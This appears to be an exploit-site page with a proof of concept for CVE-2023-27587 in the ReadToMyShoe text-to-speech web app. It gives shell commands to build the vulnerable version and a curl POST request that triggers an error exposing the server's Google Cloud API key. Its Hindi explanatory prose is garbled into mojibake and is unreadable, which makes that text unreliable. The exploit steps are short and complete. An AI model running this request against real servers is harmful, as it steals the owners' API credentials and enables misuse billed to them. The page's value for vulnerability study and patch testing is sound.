Sploitus

Exploit for CVE-2023-27587-PoC

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN38 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VAGNERD-CVE-2023-27587-POC
# CVE-2023-27587-PoC

CVE-2023-27587 рдХрд╛ рд╕рд░рд▓ PoC

## ReadToMyShoe рдХреНрдпрд╛ рд╣реИ?

ReadtoMyShoe (RTMS) рдПрдХ рд╡реЗрдм рдПрдкреНрд▓рд┐рдХреЗрд╢рди (rust, yew рдФрд░ axum) рд╣реИ рдЬреЛ рдЖрдкрдХреЛ рд▓реЗрдЦ рдЕрдкрд▓реЛрдб рдХрд░рдиреЗ (URL рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдпрд╛ рд╕реАрдзреЗ рдкреЗрд╕реНрдЯ рдХрд░рдХреЗ) рдФрд░ рдмрд╛рдж рдореЗрдВ рдЙрдиреНрд╣реЗрдВ рд╕реБрдирдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред

## рдкреНрд░рднрд╛рд╡

рдпрджрд┐ рд▓реЗрдЦ рдЬреЛрдбрд╝рддреЗ рд╕рдордп рдХреЛрдИ рддреНрд░реБрдЯрд┐ рд╣реЛрддреА рд╣реИ, рддреЛ рд╡реЗрдмрд╕рд╛рдЗрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдПрдХ рддреНрд░реБрдЯрд┐ рд╕рдВрджреЗрд╢ рджрд┐рдЦрд╛рддреА рд╣реИред рдпрджрд┐ рддреНрд░реБрдЯрд┐ Google Cloud TTS рдЕрдиреБрд░реЛрдз рд╕реЗ рдЙрддреНрдкрдиреНрди рд╣реЛрддреА рд╣реИ, рддреЛ рдЗрд╕рдореЗрдВ рдЕрдиреБрд░реЛрдз рдХрд╛ рдкреВрд░рд╛ URL рд╢рд╛рдорд┐рд▓ рд╣реЛрдЧрд╛ред рдЕрдиреБрд░реЛрдз URL рдореЗрдВ Google Cloud API рдХреБрдВрдЬреА рд╣реЛрддреА рд╣реИред

# PoC

#### рд╕рдВрд╡реЗрджрдирд╢реАрд▓ ReadtoMyShoe рд╕реЗрдЯрдЕрдк рдХрд░реЗрдВ

root@kitploit:~
    
    
    $ git clone https://github.com/rozbb/readtomyshoe.git
    $ cd readtomyshoe && git checkout v0.2.0
    $ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
    $ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
    $ docker run -p 9382:9382 readtomyshoe-vul
    

#### рд╢реЛрд╖рдг

_рдХреБрдВрдЬреА рдХреЗрд╡рд▓ рддрдм рдЙрдЬрд╛рдЧрд░ рд╣реЛрддреА рд╣реИ рдЬрдм GPC рдХреЙрд▓ рдореЗрдВ рддреНрд░реБрдЯрд┐ рд╣реЛрддреА рд╣реИ!_

root@kitploit:~
    
    
    curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
      -H 'Accept-Encoding: gzip, deflate' \
      -H 'content-type: application/json' \
      --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'